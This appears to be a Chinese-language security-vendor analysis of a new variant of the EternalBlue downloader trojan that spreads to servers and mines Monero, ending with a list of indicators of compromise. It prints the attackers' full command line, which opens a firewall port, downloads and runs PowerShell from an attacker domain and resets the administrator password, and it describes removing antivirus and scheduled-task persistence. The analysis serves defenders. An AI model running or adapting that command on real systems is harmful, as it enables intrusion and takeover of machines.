一、背景
腾讯安全威胁情报中心检测到永恒之蓝下载器木马再次出现新变种，此次变种利用Python打包EXE可执行文件进行攻击，该组织曾在2018年底使用过类似手法。腾讯安全大数据监测数据显示，永恒之蓝下载器最新变种出现之后便迅速传播，目前已感染约1.5万台服务器，中毒系统最终用于下载运行门罗币挖矿木马。

永恒之蓝下载器木马在不断演进更新过程中，曾将EXE攻击方式逐步切换到利用Powershell脚本实现无文件攻击。在其功能越来越庞大之后，该黑产团伙再次将永恒之蓝漏洞攻击利用、mssql爆破攻击的代码重新添加到EXE木马中，并对Powershell中相关代码进行屏蔽。

被​本次变种攻击​失陷后的系统会下载if.bin、下载运行由随机字符串命名的EXE攻击模块进行大规模的漏洞扫描和攻击传播，同时会下载门罗币挖矿木马占用服务器大量CPU资源挖矿，会给受害企业造成严重生产力损失。

腾讯安全专家建议企业网管参考腾讯安全响应清单，对企业网络资产进行安全检测，以及时消除永恒之蓝下载器木马的破坏活动：




更多产品信息，请参考腾讯安全官方网站6d6K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6K6i4K6u0W2N6r3g2F1j5$3g2F1N6q4)9J5k6h3y4G2L8g2)9J5c8R3`.`.

附：永恒之蓝下载器木马历次版本更新情况如下：

二、样本分析
永恒之蓝下载器木马在Powershell攻击代码中，将扫描445端口进行攻击的$IPC爆破和永恒之蓝漏洞利用攻击功能进行了屏蔽。但以下功能仍然保留：
1.“永恒之蓝”漏洞利用MS17-010
2.Lnk漏洞利用CVE-2017-8464
3.Office漏洞利用CVE-2017-8570
4.RDP爆破
5.感染可移动盘、网络磁盘
6.钓鱼邮件（使用新冠病毒疫情相关主题）
7.SMBGhost漏洞利用CVE-2020-0796
8.SSH爆破攻击Linux系统
9.Redis未授权访问漏洞攻击Linux系统

然后在攻击后执行的Payload中添加一行代码，负责下载和执行EXE攻击模块
http[:]//d.ackng.com/ode.bin。

Ode.bin是经过加密的Powershell代码，解密后的内容主要完成以下功能：
1.生成4到8位字符组成的随机字符串作为文件名<random>.exe；
2.从http[:]//167.71.87.85/20.dat下载文件保存至C:\Windows\Temp\<random>.exe；
3.如果符合权限则创建计划任务"\Microsoft\Windows\<random>.exe "每50分钟执行一次20.dat，如果不符合权限则创建C:\Windows\Temp\tt.vbs，通过VBS脚本代码创建计划任务“<random>.exe "，同样每50分钟执行一次20.dat。

通过计划任务执行的20.dat（拷贝至C:\Windows\Temp\<random>.exe md5: ef3a4697773f84850fe1a086db8edfe0）实际上是由Python代码打包的扫描攻击模块，与永恒之蓝下载器病毒2018年底第一次出现时的攻击模块C:\WINDOWS\Temp\svvhost.exe相似（参考a0cK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2X3M7X3g2W2j5Y4g2X3i4K6u0W2j5$3!0E0i4K6u0r3L8X3g2%4M7#2)9J5c8U0p5&6x3U0l9I4y4g2)9J5k6h3S2@1L8h3I4Q4c8f1k6Q4b7V1y4Q4z5o6W2Q4c8e0y4Q4z5o6m8Q4z5o6t1`.

该病毒在后来的逐步发展过程中，逐步将攻击代码转移到了Powershell实现，并且利用计划任务来动态获取和启动，不会在磁盘上留下文件，也就是“无文件攻击”模式攻击。而此次病毒重新启动exe攻击模块，可能是因为其功能不断扩展，需要将一部分代码进行分割，切割后的攻击模块及功能如下图所示。

If.bin中的Powershell攻击代码与上个版本相同，此处不再分析，分割出的xxx.exe中解码出Python实现的永恒之蓝漏洞攻击代码如下，另外还会执行$IPC、SMB、mssql弱口令爆破攻击：

攻击成功后执行shellcode
1、下载和执行Powershell代码gim.jsp；
2、修改administrator账户登陆密码为k8d3j9SjfS7并激活administrator账户；
3、添加防火墙规则允许65529端口访问并开启监听。
cmd.exe /c netsh.exe firewall add portopening tcp 65529 DNS&netsh interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53&powershell IEX(New-Object Net.WebClient).DownloadString('http[:]//t.amynx.com/gim.jsp')&net user administrator k8d3j9SjfS7&net user administrator /active:yes

gim.jsp是经过加密的Powershell代码，首先检测系统是否安装了以下杀软，如有调用卸载程序进行卸载：
Eset、Kaspersky、avast、avp、Security、AntiVirus、Norton Security、Anti-Malware

然后安装一个计划任务“blackball”和一个随机名计划任务，定期下载和执行a.jsp（a.jsp继续下载和执行挖矿和攻击模块）。

IOCs
Domain
info.zz3r0.com
info.amynx.com
w.zz3r0.com

IP
167.71.87.85

URL
http[:]//167.71.87.85/20.dat
http[:]//d.ackng.com/ode.bin
http[:]//d.ackng.com/if.bin
http[:]//t.amynx.com/gim.jsp
http[:]//t.amynx.com/smgho.jsp
http[:]//t.amynx.com/a.jsp

md5
C:\Windows\Temp\<random>.exe
ef3a4697773f84850fe1a086db8edfe0
8ec20f2cbad3103697a63d4444e5c062
ac48b1ea656b7f48c34e66d8e8d84537
d61d88b99c628179fa7cf9f2a310b4fb
f944742b01606605a55c1d55c469f0c9
abd6f640423a9bf018853a2b40111f76
57812bde13f512f918a0096ad3e38a07
d8e643c74996bf3c88325067a8fc9d78
125a6199fd32fafec11f812358e814f2
fb880dc73e4db0a43be8a68ea443bfe1
8d46dbe92242a4fde2ea29cc277cca3f
48fbe4b6c9a8efc11f256bda33f03460

gim.jsp
98f48f31006be66a8e07b0ab189b6d02

a.jsp
6bb4e93d29e8b78e51565342b929c824

ode.bin
e009720bd4ba5a83c4b0080eb3aea1fb

if.bin
092478f1e16cbddb48afc3eecaf6be68

smgho.jsp
ca717602f0700faba6d2fe014c9e6a8c

参考链接：
《“黑球”行动再升级，SMBGhost漏洞攻击进入实战》
0b4K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0M7q4)9J5k6i4N6W2K9i4S2A6L8W2)9J5k6i4q4I4i4K6u0W2j5$3!0E0i4K6u0r3M7#2)9J5c8W2A6G2K9f1E0o6g2p5g2S2P5r3S2j5d9g2S2K6d9e0c8a6P5X3S2i4N6V1p5`.

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课